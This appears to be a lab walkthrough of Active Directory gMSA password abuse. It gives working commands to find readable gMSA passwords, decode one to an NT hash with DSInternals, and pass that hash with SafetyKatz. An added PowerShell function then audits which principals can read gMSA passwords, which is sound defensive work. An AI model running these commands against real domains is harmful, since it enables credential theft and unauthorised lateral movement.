Enumerating the gMSA accounts using PowerView:
Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'

Now let’s see who is allowed to read the password blob, using the ActiveDirectory module:
Get-ADServiceAccount -Identity shaaban.backup -Properties * | select PrincipalsAllowedToRetrieveManagedPassword

Notice that the user provisioning is allowed to retrieve the password blob on the Jumpone server.
Now let’s read the password:
$Passwordblob = (Get-ADServiceAccount -Identity gmsa_backup$ -Properties msDS-ManagedPassword).'msDS-ManagedPassword'
Import-Module C:\AD\Tools\DSInternals_v4.7\DSInternals\DSInternals.psd1
$decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword

We have now retrieved the managed password of the jumpone user.
Now let’s perform Overpass-the-Hash:
.\SafetyKatz.exe "sekurlsa::pth /user:jumpone /ntlm:367032486cc36f7ba0561d7e3e90f615 /domain:us.techcorp.local /ptt"
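
The PrincipalsAllowedToRetrieveManagedPassword check above can be run as a domain-wide audit, so that readers such as the provisioning user are found before they are abused. This is an added example, not part of the original walkthrough; the function name and the MaxGroupMembers threshold are assumptions, and it needs the RSAT ActiveDirectory module.

```powershell
# Added example (not from the original walkthrough): list every principal that may read a gMSA password.
Import-Module ActiveDirectory

function Get-GmsaPasswordReaderAudit {
    [CmdletBinding()]
    param(
        # Hypothetical threshold: flag groups with more effective members than this.
        [int]$MaxGroupMembers = 10
    )
    $gmsas = Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword
    foreach ($gmsa in $gmsas) {
        foreach ($dn in $gmsa.PrincipalsAllowedToRetrieveManagedPassword) {
            $class = 'unresolved'; $count = $null
            $finding = 'principal could not be resolved; review the entry'
            try {
                $principal = Get-ADObject -Identity $dn -ErrorAction Stop
                $class = $principal.ObjectClass
                $finding = switch ($class) {
                    'user'  { 'user account can read the password; a stolen user credential exposes the gMSA' }
                    'group' {
                        # Expand nested groups to the accounts that effectively hold the right.
                        $members = @(Get-ADGroupMember -Identity $dn -Recursive -ErrorAction Stop)
                        $count = $members.Count
                        $users = @($members | Where-Object objectClass -eq 'user')
                        if ($users.Count -gt 0) { "group contains $($users.Count) user account(s)" }
                        elseif ($count -gt $MaxGroupMembers) { "group has $count effective members" }
                        else { 'ok' }
                    }
                    # Host computer accounts and other gMSAs are the expected readers.
                    { $_ -in 'computer', 'msDS-GroupManagedServiceAccount' } { 'ok' }
                    default { "unexpected object class '$class'; review" }
                }
            } catch {
                if ($class -eq 'group') { $finding = "group could not be expanded: $($_.Exception.Message)" }
            }
            [pscustomobject]@{
                Gmsa = $gmsa.SamAccountName; Principal = $dn; Class = $class
                EffectiveMembers = $count; Finding = $finding
            }
        }
    }
}

Get-GmsaPasswordReaderAudit | Sort-Object Gmsa, Principal | Format-Table -AutoSize -Wrap
```

Any row whose Finding is not "ok" is a principal whose compromise gives access to the gMSA password in the way shown above.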
